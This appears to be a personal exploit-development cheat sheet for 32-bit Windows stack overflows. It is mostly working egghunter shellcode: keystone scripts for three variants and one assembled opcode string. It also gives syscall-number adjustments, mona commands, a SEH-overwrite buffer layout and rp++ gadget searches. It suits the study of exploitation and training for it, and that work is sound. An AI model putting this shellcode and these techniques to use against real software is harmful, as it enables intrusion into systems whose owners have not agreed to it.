xct's notes
Windows Stack

Egg Hunter

Windows 10 Egghunter (w00tw00t, 32-Bit)

1
from keystone import *

# Assembly listing, kept verbatim: it is the runtime input to the assembler.
# The note that follows this listing on the page says the syscall number
# encoded in "mov eax, 0xfffffe3a" (a negated value) differs between
# Windows builds and may need adjusting.
CODE = (
    " "
    " loop_inc_page: "
    " or dx, 0x0fff ;"
    " loop_inc_one: "
    " inc edx ;"
    " loop_check: "
    " push edx ;"
    " mov eax, 0xfffffe3a ;"
    " neg eax; "
    " int 0x2e ;"
    " cmp al,05 ;"
    " pop edx ;"
    " loop_check_valid: "
    " je loop_inc_page ;"
    " is_egg: "
    " mov eax, 0x74303077 ;"
    " mov edi, edx ;"
    " scasd ;"
    " jnz loop_inc_one ;"
    " scasd ;"
    " jnz loop_inc_one ;"
    " matched: "
    " jmp edi ;"
)


# Assemble the listing for 32-bit x86 and render every byte as a "\xNN" escape.
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(CODE)
instructions = "".join("\\x{:02x}".format(int(byte)) for byte in encoding)

print('Opcodes = ("' + instructions + '")')
You might have to modify the syscall number (0x1C6 above, in negated form). Print it from windbg with u ntdll!NtAccessCheckAndAuditAlarm. E.g. on Win 10 Pro it was 0x29 for me. Then calculate the negated form (here as an example for 0x29):
>>> i = 0 - 0x29
>>> hex (i & ((1 << 32) - 1))
'0xffffffd7'
Mona can generate one as well:
0:004> .load pykd.pyd
0:004> !py mona egg -wow64 -winver 10
...
This one is also fairly reliable (32-bit process on a 64-bit system):
1
from keystone import *

# Assembly listing, kept verbatim: it is the runtime input to the assembler.
# "push 0x29" carries the syscall number the page discusses above; that value
# is build-specific, so check it for the target Windows build.
CODE = (
    "mov ebx,cs;"
    "cmp bl,0x23;"
    "xor edx,edx;"
    "or dx,0xfff;"
    "xor ebx,ebx;"
    "inc edx;"
    "push edx;"
    "push ebx;"
    "push ebx;"
    "push ebx;"
    "push 0x29;"
    "pop eax;"
    "mov bl,0xc0;"
    "call DWORD PTR fs:[ebx];"
    "add esp,0xc;"
    "pop edx;"
    "cmp al,0x5;"
    "je 0x7;"
    "mov eax,0x74303077;"
    "mov edi,edx;"
    "scas eax,DWORD PTR es:[edi];"
    "jne 0xe;"
    "scas eax,DWORD PTR es:[edi];"
    "jne 0xe;"
    "jmp edi;"
)


# Assemble the listing for 32-bit x86 and render every byte as a "\xNN" escape.
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(CODE)
instructions = "".join("\\x{:02x}".format(int(byte)) for byte in encoding)

print('Opcodes = ("' + instructions + '")')
When debugging, this one will hit breakpoints all the time. This is normal and does not mean it is not working (see https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/).

Windows 10 Egghunter (w00tw00t, custom SEH handler, 32-Bit)

1
from keystone import *

# Assembly listing, kept verbatim: it is the runtime input to the assembler.
# This variant registers its own SEH handler instead of using a syscall;
# the Corelan article linked above gives the background.
CODE = (
    " start: "
    " jmp get_seh_address ;"
    " build_exception_record: "
    " pop ecx ;"
    " mov eax, 0x74303077 ;"
    " push ecx ;"
    " push 0xffffffff ;"
    " xor ebx, ebx ;"
    " mov dword ptr fs:[ebx], esp ;"
    " sub ecx, 0x04 ;"
    " add ebx, 0x04 ;"
    " mov dword ptr fs:[ebx], ecx ;"
    " is_egg: "
    " push 0x02 ;"
    " pop ecx ;"
    " mov edi, ebx ;"
    " repe scasd ;"
    " jnz loop_inc_one ;"
    " jmp edi ;"
    " loop_inc_page: "
    " or bx, 0xfff ;"
    " loop_inc_one: "
    " inc ebx ;"
    " jmp is_egg ;"
    " get_seh_address: "
    " call build_exception_record ;"
    " push 0x0c ;"
    " pop ecx ;"
    " mov eax, [esp+ecx] ;"
    " mov cl, 0xb8 ;"
    " add dword ptr ds:[eax+ecx], 0x06 ;"
    " pop eax ;"
    " add esp, 0x10 ;"
    " push eax ;"
    " xor eax, eax ;"
    " ret ;"
)

# Assemble the listing for 32-bit x86 and render every byte as a "\xNN" escape.
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(CODE)
instructions = "".join("\\x{:02x}".format(int(byte)) for byte in encoding)

print('Opcodes = ("' + instructions + '")')
\xeb\x2a\x59\xb8\x77\x30\x30\x74\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3

SEH Overwrite

Overwrite SEH with a POP POP RET; at its target (nSEH) place EB <distance> 90 90 to jump past the exception handler struct in memory, e.g.:
<padding><jmp(nseh)><poppopret(seh)><payload>

Find Pop Pop Ret

!py mona seh

Resources

QuickZip Stack BOF 0day: a box of chocolates | Offensive Security
offsectraining

ROP

Find gadgets with rp++: https://github.com/0vercl0k/rp
rp-win-x86.exe -f <file> -r 5 > rop.txt